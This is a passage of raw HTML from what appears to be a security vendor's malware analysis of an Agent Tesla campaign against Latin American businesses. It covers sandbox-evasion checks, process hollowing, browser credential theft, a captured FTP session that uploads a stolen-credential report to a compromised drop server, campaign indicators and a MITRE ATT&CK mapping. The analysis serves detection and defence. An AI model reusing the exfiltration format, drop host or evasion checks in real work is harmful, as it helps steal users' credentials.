                                        				Sandboxie sandbox detection                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				cmdvrt32.dll                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				DLL presence check                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Comodo sandbox detection                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				SxIn.dll / Sf2.dll /				snxhk.dll                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				DLL presence check                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Avast/Sophos sandbox				detection                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-326'>
table#wpdtSimpleTable-326{ table-layout: fixed !important; }
table#wpdtSimpleTable-326 td, table.wpdtSimpleTable326 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="930" height="84" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1.png" alt="" class="wp-image-20923" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1.png 930w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1-300x27.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1-768x69.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1-370x33.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1-270x24.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image9-1-740x67.png 740w" sizes="(max-width: 930px) 100vw, 930px" /><figcaption class="wp-element-caption">Malware detects sandbox environments</figcaption></figure>



<h4 class="wp-block-heading">Exfiltration Report Format</h4>



<p>The HTML report generated by Agent Tesla and uploaded to the FTP drop server follows a fixed template, reconstructed from the payload strings. The format observed in the ANY.RUN network capture matches exactly:</p>



<pre class="wp-block-code"><code>Time: &#091;MM/dd/yyyy HH:mm:ss]
User Name: &#091;Windows username]
Computer Name: &#091;hostname]
OSFullName: &#091;Windows edition]
CPU: &#091;processor model from WMI Win32_Processor]
RAM: &#091;available RAM in MB]
&lt;hr&gt;
Host: &#091;URL where credentials were stolen from]
Username: &#091;stolen username]
Password: &#091;stolen password]
Application: &#091;browser/client name]
&lt;hr&gt;
&#091;...additional credential blocks...]
&lt;hr&gt;Copied Text: &#091;clipboard contents]</code></pre>



<p>This template is hardcoded in the payload and has remained consistent across multiple Agent Tesla v3 builds observed in LATAM campaigns. The ‘Time:’ field uses MM/dd/yyyy format, which combined with the Spanish-language lures, suggests the operator targets both English and Spanish-speaking environments.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="722" height="248" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image10.png" alt="" class="wp-image-20929" style="width:650px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image10.png 722w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image10-300x103.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image10-370x127.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image10-270x93.png 270w" sizes="(max-width: 722px) 100vw, 722px" /><figcaption class="wp-element-caption">Exfiltration report in the sandbox</figcaption></figure>



<h3 class="wp-block-heading">4. Dynamic Analysis: Behavioral Confirmation</h3>



<p>Detonating the full infection chain in ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> provided behavioral confirmation of the attack and captured artifacts that static analysis alone could not reveal.</p>



<h4 class="wp-block-heading">Process tree</h4>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="666" height="239" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1.png" alt="" class="wp-image-20930" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1.png 666w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1-300x108.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1-370x133.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image11-1-270x97.png 270w" sizes="(max-width: 666px) 100vw, 666px" /><figcaption class="wp-element-caption">Agent Tesla process chain</figcaption></figure>



<p>The full process execution chain observed in the sandbox:</p>



<ul class="wp-block-list">
<li><strong>WinRAR.exe</strong> (PID 8100) → extracts .jse dropper;</li>



<li><strong>wscript.exe</strong> (PID 2392) → executes .jse, drops PS1 stagers, downloads decoy PDF;</li>



<li><strong>powershell.exe</strong> (×4: PIDs 4600, 6116, 6240, 6412) → stager execution with bypass;</li>



<li><strong>aspnet_compiler.exe</strong> (PID 7720) → hollowed process &#8211; executes Agent Tesla payload.</li>
</ul>



<h4 class="wp-block-heading">Pre-Exfiltration: Victim Fingerprinting</h4>



<p>Before exfiltrating stolen data, Agent Tesla performs a <strong>geolocation and hosting provider check</strong> via <em>ip-api[.]com</em>. This common stealer pattern verifies the victim is not running inside a sandbox or corporate proxy before proceeding with exfiltration:</p>



<pre class="wp-block-code"><code>GET http://ip-api.com/line/?fields=hosting HTTP/1.1
Host: ip-api.com
 
→ Response: false  (victim is not a hosting provider)
→ Agent Tesla proceeds with exfiltration</code></pre>



<p>ANY.RUN flagged this request with the Suricata rule: &#8220;ET MALWARE Common Stealer Behavior — Source IP Associated with Hosting Provider Check via ip-api.com&#8221;, confirming the pre-exfiltration fingerprinting behavior.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="615" height="330" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1.png" alt="" class="wp-image-20933" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1.png 615w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1-300x161.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1-370x199.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image12-1-270x145.png 270w" sizes="(max-width: 615px) 100vw, 615px" /><figcaption class="wp-element-caption">Suricata rule triggered by possible fingerprinting</figcaption></figure></div>


<h4 class="wp-block-heading">Credential Theft</h4>



<p>The sandbox confirmed active credential theft from web browsers. The behavioral indicators observed:</p>



<ul class="wp-block-list">
<li>Accesses Chrome and Firefox browser profile directories and credential store databases;</li>



<li>Reads saved password and autofill data;</li>



<li>Formats captured credentials as HTML report for exfiltration;</li>



<li>Collects system fingerprint: hostname, username, OS version, CPU model, RAM. </li>
</ul>



<h4 class="wp-block-heading">FTP Exfiltration</h4>



<p>The most critical finding from dynamic analysis was the capture of <strong>cleartext FTP credentials and exfiltration traffic</strong>. FTP operates without transport encryption by default, making the full authentication handshake and data transfer visible in the network capture:</p>



<pre class="wp-block-code"><code>220 Welcome to Pure-FTPd &#091;privsep] &#091;TLS]
331 User americas2@horeca-bucuresti.ro OK. Password required
USER americas2@horeca-bucuresti.ro
PASS &#091;REDACTED]
230 OK. Current restricted directory is /
STOR PW_admin-DESKTOP-JGLLJLD_2026_03_27_17_19_15.html
226 File successfully transferred (3.79 KB/s)</code></pre>



<p>The exfiltrated file follows a consistent naming convention: <em>PW_[username]-[hostname]_[timestamp].html.</em> This structured naming allows the operator to efficiently process stolen credentials from multiple victims in the drop directory.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="616" height="413" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1.png" alt="" class="wp-image-20936" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1.png 616w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1-300x201.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1-370x248.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image13-1-270x181.png 270w" sizes="(max-width: 616px) 100vw, 616px" /><figcaption class="wp-element-caption">Agent Tesla exfiltrating data</figcaption></figure></div>


<p>The following Suricata rules fired during the exfiltration phase:</p>



<ul class="wp-block-list">
<li>ET MALWARE AgentTesla Exfil via FTP</li>



<li>ET MALWARE Agent Tesla CnC Exfil via TCP</li>



<li>STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) (×2)</li>



<li>SUSPICIOUS [ANY.RUN] Possible admin username observed in outbound connection</li>



<li>HUNTING [ANY.RUN] Windows PC hostname observed in outbound connection</li>



<li>HUNTING [ANY.RUN] Host CPU Enumeration observed in outbound connection</li>
</ul>



<h3 class="wp-block-heading">5. Threat Infrastructure Analysis</h3>



<h4 class="wp-block-heading">The C2 Server: 89.39.83.184</h4>



<p>The exfiltration target — ftp.horeca-bucuresti[.]ro resolving to 89[.]39[.]83[.]184 — is a <strong>legitimate Romanian hospitality business website that has been compromised</strong> and repurposed as a drop zone. This operational security tactic makes network blocking harder and attribution more difficult, since blocking the IP may affect a legitimate business.</p>



<p>Querying the IP on VirusTotal reveals <strong>80 malicious files that have communicated with this server</strong>, with the earliest samples dating to September 2024 — confirming the infrastructure has been actively maintained for <strong>at least 18 months</strong>.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="991" height="581" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14.png" alt="" class="wp-image-20939" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14.png 991w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14-300x176.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14-768x450.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14-370x217.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14-270x158.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image14-740x434.png 740w" sizes="(max-width: 991px) 100vw, 991px" /><figcaption class="wp-element-caption">Files communicating with the C2 server</figcaption></figure>



<h4 class="wp-block-heading">Campaign Scope: A LATAM-Focused Operation</h4>



<p>Analysis of the 80 samples communicating with this infrastructure reveals a clear targeting pattern focused on Spanish-speaking Latin American enterprises. Pivoting on the campaign in ANY.RUN <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktotilookuplanding">Threat Intelligence Lookup</a> with the query <em>submissionCountry:&#8221;cl&#8221; AND threatLevel:&#8221;malicious&#8221;</em> confirms Chile as the primary submission country, and surfaces correlated behavioral artifacts including the mutex <em>local\sm0:6816:304:wilstaging_02</em>, the Firebase Storage decoy PDF download URL, and all 10 Suricata network threats &#8211; all tied to aspnet_compiler.exe as the injected process.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15.jpg" alt="" class="wp-image-20940" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15-300x172.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15-768x440.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15-370x212.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15-270x155.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image15-740x423.jpg 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Malicious file search in TI Lookup</figcaption></figure>



<p>The filenames observed in the communicating files paint a consistent picture:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-327"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="327"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:44.117647058824%;                    padding:10px;
                    "
                    >
                                        				Filename                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:21.708683473389%;                    padding:10px;
                    "
                    >
                                        				Type                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:34.173669467787%;                    padding:10px;
                    "
                    >
                                        				Targeting				Context                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Orden de compra.xlam /				Orden de Compra.xlam                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Office macro lure                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Chile / Peru / Generic				LATAM                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				OC 20240814.xlam / OC				20240813.xlam                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Office macro lure                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Dated purchase orders                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Nómina de				sueldos.pdf_008.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				EXE disguised as PDF                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Payroll -  HR department				targeting                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Comprobante de pago.pdf.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				EXE disguised as PDF                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Payment receipt -  finance				targeting                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Nomina_Sept2025_Confidencial.xlam                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Office macro lure                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Confidential payroll -  HR				targeting                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Orden - N652120.008.xlam                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Office macro lure                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Numbered order -  supplier				targeting                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				givingbestthingsalwaysfor.hta                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				HTA dropper                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				English -  possible wider				targeting                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-327'>
table#wpdtSimpleTable-327{ table-layout: fixed !important; }
table#wpdtSimpleTable-327 td, table.wpdtSimpleTable327 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The Passive DNS history further reveals that the same IP hosted subdomains used as email relay infrastructure: <em>email.v.todotramitesperu.com.elgartizocon[.]ro</em> and <em>email.elrif[.]com</em> — patterns consistent with mail relay abuse to increase phishing email deliverability.</p>



<h3 class="wp-block-heading">6. MITRE ATT&amp;CK Mapping</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-328"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="11"
           data-wpID="328"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:38.386648122392%;                    padding:10px;
                    "
                    >
                                        				Technique                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:13.908205841446%;                    padding:10px;
                    "
                    >
                                        				ID                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:47.705146036161%;                    padding:10px;
                    "
                    >
                                        				Evidence                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Phishing: Spearphishing				Attachment                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				T1566.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				RAR				archive with financial lure delivered via email                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Obfuscated Files or				Information                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				T1027                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				JScript				Encoded .jse dropper evades AV                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Command and Scripting:				JavaScript                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				T1059.007                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				wscript.exe				executes .jse dropper                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Command and Scripting:				PowerShell                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				T1059.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Stager with				-ExecutionPolicy Bypass                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Process Injection: Process				Hollowing                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				T1055.012                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				ALTERNATE.dll				injected into aspnet_compiler.exe                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Software Packing /				Virtualization                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				T1027.002                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				.NET				Reactor 6.x with VM + control flow obfuscation                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Credentials from Web				Browsers                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				T1555.003                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Chrome,				Firefox credential store access confirmed                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				Exfiltration				Over Alternative Protocol: FTP                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				T1048.003                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				Cleartext				FTP to ftp.horeca-bucuresti.ro:21                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        				System Information				Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        				T1082                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        				CPU, RAM, OS version				enumeration pre-exfil                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        				System Network				Configuration Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        				T1016                    </td>
                                                <td class="wpdt-cell wpdt-align-left"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        				External IP lookup via				ip-api.com                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-328'>
table#wpdtSimpleTable-328{ table-layout: fixed !important; }
table#wpdtSimpleTable-328 td, table.wpdtSimpleTable328 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
</style>




<h2 class="wp-block-heading">Early Detection: Using ANY.RUN Against Agent Tesla Campaigns</h2>



<p>ANY.RUN’s Interactive Sandbox is particularly effective for early detection of sophisticated multi-stage loaders like this Agent Tesla campaign. Security teams should integrate the following practices:</p>



<ul class="wp-block-list">
<li><strong>Proactive Sample Submission</strong>: Upload suspicious attachments (especially RAR archives with non-standard extensions like .uu, .jse, or macro-enabled Office files) immediately upon receipt for interactive analysis.</li>



<li><strong>Behavioral Monitoring</strong>: Use ANY.RUN’s real-time process tree visualization and Suricata rule matching to identify Process Hollowing into aspnet_compiler.exe, PowerShell stagers, and FTP exfiltration patterns.</li>



<li><strong>Threat Intelligence Pivoting</strong>: After identifying a C2 indicator (e.g., ftp.horeca-bucuresti[.]ro or IP 89.39.83[.]184), pivot within ANY.RUN Threat Intelligence to uncover related samples and campaign scope.</li>



<li><strong>Team Training</strong>: Conduct regular red-team exercises in the interactive environment to train analysts on recognizing .NET Reactor-protected loaders and fileless execution techniques.</li>



<li><strong>Automated Workflows</strong>: <a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=agent-tesla-latam-enterprise&amp;utm_term=140526&amp;utm_content=linktointegrations">Integrate</a> ANY.RUN via API for high-volume email gateway triage, enabling rapid quarantine of matching threats before they reach end users.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Accelerate investigations and enrich security workflows</span><br>
Detection, threat intelligence, hunting, proactive defense.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=agent-tesla-latam-enterprise&#038;utm_term=140526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Start here
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
